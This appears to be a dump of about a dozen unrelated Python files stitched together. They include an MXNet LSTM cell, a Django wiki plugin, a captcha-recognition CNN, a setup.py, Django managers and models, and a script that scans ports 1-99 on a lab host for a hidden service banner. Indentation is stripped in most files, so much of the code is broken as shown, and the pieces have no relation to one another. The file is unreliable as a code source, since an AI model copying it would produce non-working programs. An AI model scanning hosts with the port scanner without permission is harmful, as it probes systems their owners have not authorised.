i_t = \sigmoid(W_{ii} x_t + b_{ii} + W_{ri} r_{(t-1)} + b_{ri}) \\
f_t = \sigmoid(W_{if} x_t + b_{if} + W_{rf} r_{(t-1)} + b_{rf}) \\
g_t = \tanh(W_{ig} x_t + b_{ig} + W_{rc} r_{(t-1)} + b_{rg}) \\
o_t = \sigmoid(W_{io} x_t + b_{io} + W_{ro} r_{(t-1)} + b_{ro}) \\
c_t = c_{\text{clip}}(f_t * c_{(t-1)} + i_t * g_t) \\
h_t = o_t * \tanh(c_t) \\
r_t = p_{\text{clip}}(W_{hr} h_t)
\end{array}
where :math:`c_{\text{clip}}` is the cell clip applied on the next cell;
:math:`r_t` is the projected recurrent activation at time `t`,
:math:`p_{\text{clip}}` means apply projection clip on the projected output.
:math:`h_t` is the hidden state at time `t`, :math:`c_t` is the
cell state at time `t`, :math:`x_t` is the input at time `t`, and :math:`i_t`,
:math:`f_t`, :math:`g_t`, :math:`o_t` are the input, forget, cell, and
out gates, respectively.
Parameters
----------
hidden_size : int
Number of units in cell state symbol.
projection_size : int
Number of units in output symbol.
i2h_weight_initializer : str or Initializer
Initializer for the input weights matrix, used for the linear
transformation of the inputs.
h2h_weight_initializer : str or Initializer
Initializer for the recurrent weights matrix, used for the linear
transformation of the hidden state.
h2r_weight_initializer : str or Initializer
Initializer for the projection weights matrix, used for the linear
transformation of the recurrent state.
i2h_bias_initializer : str or Initializer, default 'lstmbias'
Initializer for the bias vector. By default, bias for the forget
gate is initialized to 1 while all other biases are initialized
to zero.
h2h_bias_initializer : str or Initializer
Initializer for the bias vector.
prefix : str
Prefix for name of `Block`s
(and name of weight if params is `None`).
params : Parameter or None
Container for weight sharing between cells.
Created if `None`.
cell_clip : float
Clip cell state between `[-cell_clip, cell_clip]` in LSTMPCellWithClip cell
projection_clip : float
Clip projection between `[-projection_clip, projection_clip]` in LSTMPCellWithClip cell
"""
def __init__(self, hidden_size, projection_size,
i2h_weight_initializer=None, h2h_weight_initializer=None,
h2r_weight_initializer=None,
i2h_bias_initializer='zeros', h2h_bias_initializer='zeros',
input_size=0, cell_clip=None, projection_clip=None, prefix=None, params=None):
super(LSTMPCellWithClip, self).__init__(hidden_size,
projection_size,
i2h_weight_initializer,
h2h_weight_initializer,
h2r_weight_initializer,
i2h_bias_initializer,
h2h_bias_initializer,
input_size,
prefix=prefix,
params=params)
self._cell_clip = cell_clip
self._projection_clip = projection_clip
# pylint: disable= arguments-differ
def hybrid_forward(self, F, inputs, states, i2h_weight,
h2h_weight, h2r_weight, i2h_bias, h2h_bias):
r"""Hybrid forward computation for Long-Short Term Memory Projected network cell
with cell clip and projection clip.
Parameters
----------
inputs : input tensor with shape `(batch_size, input_size)`.
states : a list of two initial recurrent state tensors, with shape
`(batch_size, projection_size)` and `(batch_size, hidden_size)` respectively.
Returns
--------
out : output tensor with shape `(batch_size, num_hidden)`.
next_states : a list of two output recurrent state tensors. Each has
the same shape as `states`.
"""
prefix = 't%d_'%self._counter
i2h = F.FullyConnected(data=inputs, weight=i2h_weight, bias=i2h_bias,
num_hidden=self._hidden_size*4, name=prefix+'i2h')
h2h = F.FullyConnected(data=states[0], weight=h2h_weight, bias=h2h_bias,
num_hidden=self._hidden_size*4, name=prefix+'h2h')
gates = i2h + h2h
slice_gates = F.SliceChannel(gates, num_outputs=4, name=prefix+'slice')
in_gate = F.Activation(slice_gates[0], act_type='sigmoid', name=prefix+'i')
forget_gate = F.Activation(slice_gates[1], act_type='sigmoid', name=prefix+'f')
in_transform = F.Activation(slice_gates[2], act_type='tanh', name=prefix+'c')
out_gate = F.Activation(slice_gates[3], act_type='sigmoid', name=prefix+'o')
next_c = F._internal._plus(forget_gate * states[1], in_gate * in_transform,
name=prefix+'state')
if self._cell_clip is not None:
next_c = next_c.clip(-self._cell_clip, self._cell_clip)
hidden = F._internal._mul(out_gate, F.Activation(next_c, act_type='tanh'),
name=prefix+'hidden')
next_r = F.FullyConnected(data=hidden, num_hidden=self._projection_size,
weight=h2r_weight, no_bias=True, name=prefix+'out')
if self._projection_clip is not None:
next_r = next_r.clip(-self._projection_clip, self._projection_clip)
return next_r, [next_r, next_c]
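# Illustrative sketch only: the sizes, shapes, and clip values below are assumptions,
# not values prescribed by the class above.
if __name__ == '__main__':
    import mxnet as mx
    cell = LSTMPCellWithClip(hidden_size=64, projection_size=32,
                             cell_clip=3.0, projection_clip=3.0)
    cell.initialize()
    inputs = mx.nd.random.uniform(shape=(8, 5, 16))  # (batch_size, seq_len, input_size)
    outputs, states = cell.unroll(length=5, inputs=inputs, merge_outputs=True)
    print(outputs.shape)  # (8, 5, 32): the projected recurrent activations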
|
t=int(input()) #To accept number of testcases
while(t!=0):
n,k=input().split() #accept the input
n=int(n)
k=int(k)
arr=list(map(int,input().split())) # to get the array of elements
counts = {}
for i in arr:
    counts[i] = counts.get(i, 0) + 1  # count occurrences of each element
# print every element that appears exactly once in the given array
for i in counts:
    if counts[i] == 1:
        print(i)
t-=1 #decrement the number of test cases by 1
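# Worked example (illustrative): for t=1 and the line "5 1" followed by "1 2 2 3 3",
# only 1 appears exactly once, so the program prints 1.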
|
from __future__ import absolute_import, unicode_literals
from typing import Any, Dict
from django.utils.translation import ugettext as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from . import settings
from .mdx.otis import OTISExtension
class HaxxPlugin(BasePlugin):
slug = settings.SLUG
sidebar: Dict[str, Any] = {
'headline': _('OTIS'),
'icon_class': 'fa-info-circle',
'template': 'wikihaxx/sidebar.html',
'form_class': None,
'get_form_kwargs': (lambda a: {})
}
markdown_extensions = [
OTISExtension(),
]
registry.register(HaxxPlugin)
|
""" CNN model architecture for captcha
"""
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
from config import args
class Net(nn.Module):
def __init__(self, output):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, stride=1, padding=1)
self.conv2 = nn.Conv2d(32, 32, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(32, 64, 3, stride=1, padding=1)
self.conv4 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.mp = nn.MaxPool2d(2)
self.dropout = nn.Dropout2d(0.5)
self.relu = nn.ReLU(inplace=True)
self.fc1 = nn.Linear(16 * 16 * 64, 1024)
self.fc2 = nn.Linear(1024, output)
def forward(self, x):
batch_size = x.size(0)
x = self.relu(self.conv1(x))
x = self.relu(self.conv2(x))
x = self.mp(x)
x = self.relu(self.conv3(x))
x = self.relu(self.conv4(x))
x = self.mp(x)
x = x.view(batch_size, -1)
x = self.dropout(x)
x = self.relu(self.fc1(x))
x = self.fc2(x)
return x
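# Quick shape check, assuming 1x64x64 grayscale inputs (two 2x poolings give the
# 16*16*64 features expected by fc1); the class count of 36 is an assumption.
if __name__ == "__main__":
    net = Net(output=36)
    dummy = torch.randn(4, 1, 64, 64)   # (batch, channels, height, width)
    print(net(dummy).shape)              # torch.Size([4, 36])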
|
# encoding=UTF-8
# Copyright © 2010-2017 Jakub Wilk <jwilk@jwilk.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
*python-morfeusz* is a Python interface to Morfeusz_,
a Polish morphological analyser.
.. _Morfeusz:
http://sgjp.pl/morfeusz/
'''
import io
import os
import distutils.core
from distutils.command.sdist import sdist as distutils_sdist
try:
import distutils644
except ImportError:
pass
else:
distutils644.install()
b'' # Python >= 2.6 is required
def get_version():
with io.open('doc/changelog', encoding='UTF-8') as file:
line = file.readline()
return line.split()[1].strip('()')
class cmd_sdist(distutils_sdist):
def maybe_move_file(self, base_dir, src, dst):
src = os.path.join(base_dir, src)
dst = os.path.join(base_dir, dst)
if os.path.exists(src):
self.move_file(src, dst)
def make_release_tree(self, base_dir, files):
distutils_sdist.make_release_tree(self, base_dir, files)
self.maybe_move_file(base_dir, 'LICENSE', 'doc/LICENSE')
classifiers = '''
Development Status :: 7 - Inactive
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Natural Language :: Polish
Operating System :: POSIX :: Linux
Operating System :: MacOS :: MacOS X
Operating System :: Microsoft :: Windows
Programming Language :: Python
Programming Language :: Python :: 2
Programming Language :: Python :: 3
Topic :: Text Processing :: Linguistic
'''.strip().splitlines()
distutils.core.setup(
name='python-morfeusz',
version=get_version(),
license='MIT',
description='interface to Morfeusz',
long_description=__doc__.strip(),
classifiers=classifiers,
url='http://jwilk.net/software/python-morfeusz',
author='Jakub Wilk',
author_email='jwilk@jwilk.net',
py_modules=['morfeusz'],
cmdclass = dict(
sdist=cmd_sdist,
)
)
# vim:ts=4 sts=4 sw=4 et
|
#// Don't forget to hit SUBSCRIBE, COMMENT, LIKE, SHARE! and LEARN... Its good to learn! :)
# But srsly, hit that sub button so you don't miss out on more content!
'''Port scanner that walks ports 1-99 on the target host until the hidden
service banner ("Congratulations") is found.'''
import socket
for portx in range(1, 100):
    # A socket cannot be reused after connect()/close(), so open a fresh one per port.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    try:
        s.connect(('ad.samsclass.info', portx))
        r = s.recv(1024).decode('utf8')
        if 'Congratulations' in r:
            print('[!] HIDDEN SERVICE FOUND: %s ~ %s' % (portx, r))
            break
        print('%s ~ %s' % (portx, r))
    except socket.error as err:
        print('%s ~ %s' % (portx, err))
    finally:
        s.close()
|
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.conf import settings
class TrsReport(object):
"""A report to send to a transmittal communication list."""
def __init__(self, trs_import):
self.trs_import = trs_import
self.email_list = trs_import.email_list
def get_subject(self):
raise NotImplementedError()
def get_body(self):
raise NotImplementedError()
def send(self):
"""Send the report to the email list."""
send_mail(
self.get_subject(),
self.get_body(),
settings.DEFAULT_FROM_EMAIL,
self.email_list
)
class ErrorReport(TrsReport):
def get_subject(self):
return 'Error log on transmittal %s' % self.trs_import.basename
def get_body(self):
context = {
'basename': self.trs_import.basename,
'errors': self.trs_import.errors,
}
tpl = render_to_string('reports/error.txt', context)
return tpl
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---------------------------------------
# Project: PKUYouth Webserver v2
# File: exceptions.py
# Created Date: 2020-07-27
# Author: Xinghong Zhong
# ---------------------------------------
# Copyright (c) 2020 PKUYouth
class PKUYouthException(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
super().__init__()
self.message = message
self.status_code = status_code or self.__class__.status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['errmsg'] = self.message
return rv
class RequestArgumentError(PKUYouthException):
""" 请求参数错误 """
class WxbotAuthFailed(PKUYouthException):
""" 微信服务器接入认证失败 """
class MiniappGetAccessTokenFailed(PKUYouthException):
""" 获取微信 API 访问凭证失败 """
class MiniappJscode2sessionFailed(PKUYouthException):
""" 未能成功通过微信服务器与小程序用户建立会话 """
class MiniappUnauthorized(PKUYouthException):
""" 小程序用户认证失败 """
status_code = 401
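# Hypothetical sketch of how these exceptions might be consumed by a Flask-style
# error handler (the app object and jsonify import are assumptions, not part of this module):
#
#     @app.errorhandler(PKUYouthException)
#     def handle_pkuyouth_exception(e):
#         return jsonify(e.to_dict()), e.status_code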
|
from django.contrib import admin
from expiring_links.models import ExpiringLink
admin.site.register(ExpiringLink)
|
from __future__ import absolute_import, unicode_literals
import logging
from django.apps import apps
from django.db import models, transaction
from django.utils.timezone import now
from mayan.apps.documents.models import Document
from .events import (
event_document_auto_check_in, event_document_check_in,
event_document_forceful_check_in
)
from .exceptions import DocumentNotCheckedOut
from .literals import STATE_CHECKED_OUT, STATE_CHECKED_IN
logger = logging.getLogger(__name__)
class DocumentCheckoutManager(models.Manager):
def are_document_new_versions_allowed(self, document, user=None):
try:
check_out_info = self.document_check_out_info(document=document)
except DocumentNotCheckedOut:
return True
else:
return not check_out_info.block_new_version
def check_in_document(self, document, user=None):
try:
document_check_out = self.model.objects.get(document=document)
except self.model.DoesNotExist:
raise DocumentNotCheckedOut
else:
with transaction.atomic():
if user:
if self.get_check_out_info(document=document).user != user:
event_document_forceful_check_in.commit(
actor=user, target=document
)
else:
event_document_check_in.commit(actor=user, target=document)
else:
event_document_auto_check_in.commit(target=document)
document_check_out.delete()
def check_in_expired_check_outs(self):
for document in self.expired_check_outs():
document.check_in()
def check_out_document(self, document, expiration_datetime, user, block_new_version=True):
return self.create(
block_new_version=block_new_version, document=document,
expiration_datetime=expiration_datetime, user=user
)
def checked_out_documents(self):
return Document.objects.filter(
pk__in=self.model.objects.values('document__id')
)
def get_check_out_info(self, document):
try:
return self.model.objects.get(document=document)
except self.model.DoesNotExist:
raise DocumentNotCheckedOut
def get_check_out_state(self, document):
if self.is_checked_out(document=document):
return STATE_CHECKED_OUT
else:
return STATE_CHECKED_IN
def expired_check_outs(self):
expired_list = Document.objects.filter(
pk__in=self.model.objects.filter(
expiration_datetime__lte=now()
).values_list('document__pk', flat=True)
)
logger.debug('expired_list: %s', expired_list)
return expired_list
def get_by_natural_key(self, document_natural_key):
Document = apps.get_model(
app_label='documents', model_name='Document'
)
try:
document = Document.objects.get_by_natural_key(document_natural_key)
except Document.DoesNotExist:
raise self.model.DoesNotExist
return self.get(document__pk=document.pk)
def is_checked_out(self, document):
return self.filter(document=document).exists()
class NewVersionBlockManager(models.Manager):
def block(self, document):
self.get_or_create(document=document)
def is_blocked(self, document):
return self.filter(document=document).exists()
def get_by_natural_key(self, document_natural_key):
Document = apps.get_model(
app_label='documents', model_name='Document'
)
try:
document = Document.objects.get_by_natural_key(document_natural_key)
except Document.DoesNotExist:
raise self.model.DoesNotExist
return self.get(document__pk=document.pk)
def unblock(self, document):
self.filter(document=document).delete()
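# Hypothetical usage sketch, assuming a DocumentCheckout model that uses DocumentCheckoutManager
# as its default manager (model and variable names below are illustrative):
#
#     DocumentCheckout.objects.check_out_document(
#         document=document,
#         expiration_datetime=now() + datetime.timedelta(hours=4),
#         user=request.user,
#         block_new_version=True,
#     )
#     DocumentCheckout.objects.check_in_document(document=document, user=request.user)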
|
from django.db import models
# Create your models here.
class Student(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=100)
class Professor(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=100)
class Score(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=100)
professor = models.ForeignKey(Professor, on_delete=models.CASCADE)
student = models.ForeignKey(Student, on_delete=models.CASCADE)
value = models.DecimalField(max_digits=4, decimal_places=2)
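# Illustrative query sketch (assumes the models above are migrated; not part of the app code):
#
#     from django.db.models import Avg
#     Score.objects.values('professor__name').annotate(average=Avg('value'))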
|